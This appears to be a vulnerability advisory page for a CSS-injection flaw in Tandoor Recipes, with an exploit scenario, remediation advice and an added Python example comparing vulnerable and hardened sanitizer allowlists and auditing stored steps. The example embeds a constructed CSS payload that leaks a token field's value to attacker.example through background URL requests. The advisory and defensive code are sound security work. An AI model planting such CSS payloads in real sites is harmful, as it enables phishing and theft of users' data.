Severity by source
Primary rating from GitHub Advisory (only source for this CVE).
CVSS vector (GitHub Advisory): CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Description (GitHub Advisory)
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Prior to 2.6.4, Tandoor Recipes allows authenticated users to inject arbitrary <style> tags into recipe step instructions. The bleach.clean() sanitizer explicitly whitelists the <style> tag, causing the backend to persist and serve unsanitized CSS payloads via the API. Any client consuming instructions_markdown from the API and rendering it as HTML without additional sanitization will execute attacker-controlled CSS - enabling UI redressing, phishing overlays, visual defacement, and CSS-based data exfiltration. This vulnerability is fixed in 2.6.4.
Analysis (AI)
Tandoor Recipes prior to version 2.6.4 allows authenticated users to inject malicious CSS via <style> tags in recipe step instructions because the application's bleach.clean() allowlist explicitly includes the <style> tag (bleach does not permit it by default). Client applications rendering the instructions_markdown field from the API without additional sanitization will execute attacker-controlled CSS, enabling UI redressing, phishing overlays, visual defacement, and CSS-based data exfiltration. …
Vulnerability Assessment (AI)
| Field | Assessment |
| --- | --- |
| Risk Assessment | This vulnerability presents moderate real-world risk, in line with its CVSS base score of 5.4. … |
| Exploit Scenario | An authenticated user with recipe editing permissions injects a malicious <style> tag containing CSS that repositions the login form and changes its opacity, overlaying a phishing form when another user views the recipe instructions in a web client. Alternatively, an attacker crafts CSS attribute selectors (e.g., input[value^="admin"]) that exfiltrate attribute values through background-image URL requests to an attacker-controlled server. … |
| Remediation | Upgrade Tandoor Recipes to version 2.6.4 or later, which fixes the sanitization of <style> tags in step instructions. … |
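To make the mechanism in the description and the exploit scenario concrete, here is an added example; it is not Tandoor's code. A small allowlist sanitizer built on the standard library stands in for bleach.clean(), once with "style" in its allowlist (the vulnerable shape) and once without, and an audit function scans step records for stored <style> payloads. The allowlists, the payload, the attacker host, the field name "token" and the sample steps are all constructed; only the API field name instructions_markdown comes from the advisory.

```python
"""Added example, not Tandoor's code: a stdlib allowlist sanitizer standing in
for bleach.clean(), plus an audit over API step records for <style> payloads."""
import re
from html import escape
from html.parser import HTMLParser

# Assumed allowlists for illustration; the project's real configuration is not
# reproduced here. The vulnerable one includes "style", the hardened one does not.
VULNERABLE_TAGS = frozenset({"p", "b", "i", "strong", "em", "ul", "ol", "li", "style"})
HARDENED_TAGS = VULNERABLE_TAGS - {"style"}


class AllowlistSanitizer(HTMLParser):
    """Emit allowed tags bare (attributes dropped for brevity) and escape every
    other tag so it renders as literal text instead of markup."""

    def __init__(self, allowed):
        super().__init__()
        self.allowed = allowed
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag in self.allowed:
            self.out.append(f"<{tag}>")
        else:
            self.out.append(escape(self.get_starttag_text()))

    def handle_endtag(self, tag):
        close = f"</{tag}>"
        self.out.append(close if tag in self.allowed else escape(close))

    def handle_data(self, data):
        # HTMLParser hands <style> bodies over as raw data (CDATA mode), so the
        # CSS text reaches this hook unchanged whether or not the tag is allowed;
        # what decides the outcome is whether the surrounding tag survives.
        self.out.append(escape(data, quote=False))


def sanitize(html_text, allowed):
    parser = AllowlistSanitizer(allowed)
    parser.feed(html_text)
    parser.close()
    return "".join(parser.out)


# Constructed payload: an attribute-selector probe that fires a request to an
# attacker host when a form field's value attribute starts with "a".
PAYLOAD = ('<style>input[name="token"][value^="a"]'
           '{background:url(https://attacker.example/leak?c=a)}</style>')

# Constructed sample of recipe steps as the API might return them.
SAMPLE_STEPS = [
    {"id": 1, "instructions_markdown": "Preheat the oven to <b>200 C</b>."},
    {"id": 2, "instructions_markdown": "Mix the flour. " + PAYLOAD},
    {"id": 3, "instructions_markdown": "<style>p{color:red}</style>Serve."},
]

STYLE_RE = re.compile(r"<style\b", re.I)
# url(...) fetches and attribute selectors such as [value^="x"] are the building
# blocks of CSS exfiltration; their presence upgrades a finding from defacement.
EXFIL_RE = re.compile(r"url\s*\(|\[\s*[\w-]+\s*[\^$*~|]?=", re.I)


def audit_steps(steps):
    """Return (step id, looks_like_exfil) for every step carrying a <style> tag.
    Worth running over stored data: if a fix sanitizes at write time, records
    saved before the upgrade are not cleaned retroactively."""
    findings = []
    for step in steps:
        text = step.get("instructions_markdown", "")
        if STYLE_RE.search(text):
            findings.append((step["id"], bool(EXFIL_RE.search(text))))
    return findings


if __name__ == "__main__":
    print("vulnerable:", sanitize(PAYLOAD, VULNERABLE_TAGS))
    print("hardened:  ", sanitize(PAYLOAD, HARDENED_TAGS))
    print("audit:     ", audit_steps(SAMPLE_STEPS))
```

With "style" allowed the payload comes back byte-for-byte and will be served by the API; with it removed the tag is escaped and the CSS renders as inert text. Two caveats for the exploit scenario: CSS attribute selectors only match values present as attributes in the markup (prefilled or hidden fields, tokens rendered into the page), not text a user types after load, since typing changes the value property rather than the attribute; and upgrading only changes what is accepted going forward, so previously stored steps should be audited and re-saved or cleaned.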
Other Tandoor Recipes advisories
- Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
- Tandoor Recipes prior to 2.5.1 contains a blind server-side request forgery vulnerability in the Cookmate recipe import
- Tandoor Recipes 2.0.0-alpha-1, fixed in 2.0.0-alpha-2, is vulnerable to privilege escalation. Rated medium severity (CVS
- Path traversal in Tandoor Recipes prior to 2.5.1 allows authenticated users with import permissions to read arbitrary fi
- Privilege escalation in Tandoor Recipes prior to version 2.6.4 allows authenticated users with read-only shared access t
- Authenticated users can modify and expose private recipes in Tandoor Recipes through broken object-level authorization i
- Unauthenticated API input validation flaws in Tandoor Recipes (<2.6.4) enable cross-tenant data leakage and denial of se
- Tandoor Recipes versions prior to 2.6.0 allow authenticated remote attackers to cause denial of service by injecting URL
- Tandoor Recipes versions prior to 2.6.5 suffer from a denial-of-service vulnerability in the recipe import functionality
- Tandoor Recipes versions prior to 2.6.0 allow authenticated admin users to bypass space isolation controls and trigger s
- Tandoor Recipes versions prior to 2.6.0 fail to strip EXIF metadata from WebP and GIF image uploads, exposing sensitive
- Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated high severity
Weakness: CWE-79 – Cross-site Scripting (XSS)
Also tracked as EUVD-2026-19390